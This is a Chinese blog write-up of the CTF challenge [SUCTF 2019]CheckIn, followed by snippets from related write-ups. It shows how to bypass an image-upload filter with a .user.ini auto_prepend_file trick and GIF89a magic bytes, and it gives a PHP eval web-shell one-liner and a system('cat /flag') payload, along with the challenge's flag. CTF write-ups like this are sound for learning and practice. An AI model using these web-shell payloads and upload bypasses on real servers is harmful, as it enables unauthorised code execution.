[SUCTF 2019]CheckIn 1

已于 2022-07-20 09:26:49 修改
阅读量529 收藏 1
点赞数
文章标签: web
于 2022-07-03 10:05:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43618536/article/details/125577323
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

[SUCTF 2019]CheckIn 1

题目

BUUCTF的[SUCTF 2019]CheckIn 1
在这里插入图片描述

一、做题步骤

1.上传文件

1.上传.user.ini文件,这个文件必须在一句话木马前上传

GIF89a  
auto_prepend_file=1.jpg

在这里插入图片描述

2.上传一句话木马

GIF89a
<script language ="php">
eval($_POST[1]);
</script>

在这里插入图片描述

2.菜刀连接

1.添加信息

http://53aeef0f-64de-4f9f-81ef-4c9667c6e6b2.node4.buuoj.cn:81/uploads/c47b21fcf8f0bc8b3920541abd8024fd/index.php

因为看到当前目录下有个index.php文件,所以以此作为上传路径

在这里插入图片描述

2.获取flag
根目录下有flag文件
flag{dd4a4121-739f-4586-bbc1-be9b4ea3baf7}

在这里插入图片描述

林本
关注
[SUCTF 2019]CheckIn 1(详解)
qq_52843575的博客
12-12 6316
1.基础检测 进入页面是一个简单文件上传界面,正常上传文件,发现上传空内容的jpg文件显示(exif_imagetype:not image!),可知有内容检测,上传代码文件也发现后缀名过滤 开始抓包操作,因为后缀名验证,伪造文件属性也失效了,与此同时发现“?”被过滤了简单利用 2.解题关键 这道题解题关键在于怎样突破后缀名绕过,就得利用.user.ini文件留后门了 user.ini留后门原理 简单来说,就是利于.user.ini指定文件,在其当前目录下的文件执行时会将你指定的文件中的代码执行出
[SUCTF 2019] web题-CheckIn
BROTHERYY的博客
07-07 563
复现环境:buuoj.cn 尝试了各种上传绕过的方法,但依然还是不行,看了下其他大佬的wp,茅塞顿开,也说明我太菜了。 写入保存将ctf.txt改为ctf.jpg auto_prepend_file 表示在php程序加载应用程序前加载指定的php文件 auto_append_file 表示在php代码执行完毕后加载指定的php文件 自定义的.user,ini先执行auto_prepend_file函数,auto_prepend_file 表示在php程序加载应用程序前加载指定的php文件,也就是先加
[SUCTF 2019]CheckIn1
最新发布
m0_73673698的博客
06-08 229
利用上传的一句话进行GET传参cmd=var_dump(scandir('/'));看到upload页面猜测文件上传,随便传了一个txt,给提示not image!读取一个图像的第一个字节并检查其签名。用蚁剑连不上(orz)
[SUCTF 2019]CheckIn 1
m0_51426816的博客
03-12 277
查看GitHub中的源码 <?php // error_reporting(0); $userdir = "uploads/" . md5($_SERVER["REMOTE_ADDR"]); if (!file_exists($userdir)) { mkdir($userdir, 0777, true); } file_put_contents($userdir . "/index.php", ""); if (isset($_POST["upload"])) { $tmp_name
SUCTF 2019 CheckIn 作题有感
qq_46184013的博客
04-15 664
一.SUCTF 2019 CheckIn 刚开始打开这道题以为只是一道普通的文件上传, 先是试了试php一句话木马,提示 这里显示 是对<?进行过滤了 这时候想到可以换一种方法,用 <script language='php'>system('cat /flag');</script>对<?进行替换。 但发现还是不行,出现这个界面。 我是小白也不懂这个啊,去...
SUCTF web CheckIn
weixin_42499640的博客
08-19 2749
记录一道SUCTFweb1 据菠萝师傅说这是他们出的签到题 我tcl
buuctf web 13、[SUCTF 2019]CheckIn
m0_46412682的博客
07-16 1108
buuctf web 13、[SUCTF 2019]CheckIn 开始的页面 1、 先上传一个正常的照片 2、再上传一个php文件,提示illegal suffix 3、上传一个只含一句话木马的后缀为gif的文件,提示内容中有<? 既然过滤了<? ,所以用 4、上传7.gif,但是提示不是gif类型,exif_imagetype是文件内容的头部看是否是对应的照片类型 我们只需要再文件中填写对应的照片头部 上传成功 5、但是要怎么样才能让照片木马执行,我们想到.htaccess
[SUCTF 2019] CheckIn 1
feng的博客
10-22 1180
知识点 上传.user.ini文件,条件如下: (1)服务器脚本语言为PHP (2)对应目录下面有可执行的php文件 (3)服务器使用CGI/FastCGI模式 现在大部分网站都是用的fastcgi,这个东西我理解的是可以提供web服务器的一种api,而apache/nginx/iis这些服务器都会依靠这种api来运行 而在服务器以fastcgi启动运行的时候,.user.ini也是php的一种配置文件,众所周知php.ini是php的配置文件,它可以做到显示报错,导入扩展,文件解析,web站点路径等等设置
[SUCTF 2019] Check In 1
c1516175954的博客
03-02 304
[SUCTF 2019]CheckIn1源码审计
[SUCTF 2019]CheckIn
夜幕下的灯火阑珊的博客
05-11 1264
知识点 文件上传 .user.ini 利用.user.ini进行文件上传,参考自从SUCTF 2019 CheckIn 浅谈.user.ini的利用 上传这样的一个ini文件 GIF89a auto_prepend_file=a.jpg 再上传一个a.jpg文件 GIF89a <script language='php'>system('cat /flag');</script> 访问uploads/2c67ca1eaeadbdc1868d67003072b481/inde
BUUCTF——[SUCTF 2019]CheckIn 1
小白一枚多多关注的博客
04-12 1502
这道题应为我的理论限制,所以做了段时间才做出来,这道题它有两个知识前提,第一个就是.user.ini和图片文件头欺骗,这两点在这里有着举足轻重得作用,可以说不了解这两点就大概率得做不出这道题,前置知识点我也没咋理解好,但是这里有一篇写得不错得文章推荐给你门看看: .user.ini得作用以及配置 图片文件头欺骗 前置知识点知道后,那就开始进入环境并且解体了 进入环境后我们会看见一个文件上传得网页,当我一看到这个网页得时候我的第一想法就是文件上传漏洞,当然最后的实验结果也确实是这个漏洞,不过它这里用了一个p
[SUCTF 2019]CheckIn1-BUUCTF-xing
chinese_cabbage0的博客
02-01 606
web安全
[SUCTF 2019]CheckIn 1 学习笔记
weixin_45869407的博客
10-15 428
刚刚做到这道题的时候以为就只是一个简答的文件上传,结果发现自己上传的图片马被拦截了,发现不能有<?符合,然后改成,但最后不知道该怎么弄,无奈自己太菜,只能看大佬writeup(做题不是关键) ...
2021gkctf checkin
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全挑战,包括密码学、逆向工程、漏洞利用等等。参赛者需要通过解决这些挑战来获取旗帜(flag),并提交给比赛组织者。 比赛的checkin阶段通常是指参赛者进行报名和注册的过程。具体的checkin流程可能因比赛组织者而异,一般需要填写个人信息、同意比赛规则等等。 如果你想了解更多关于2021gkctf checkin的信息,建议你访问GKSEC团队的官方网站或者参考他们的相关公告和规则。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值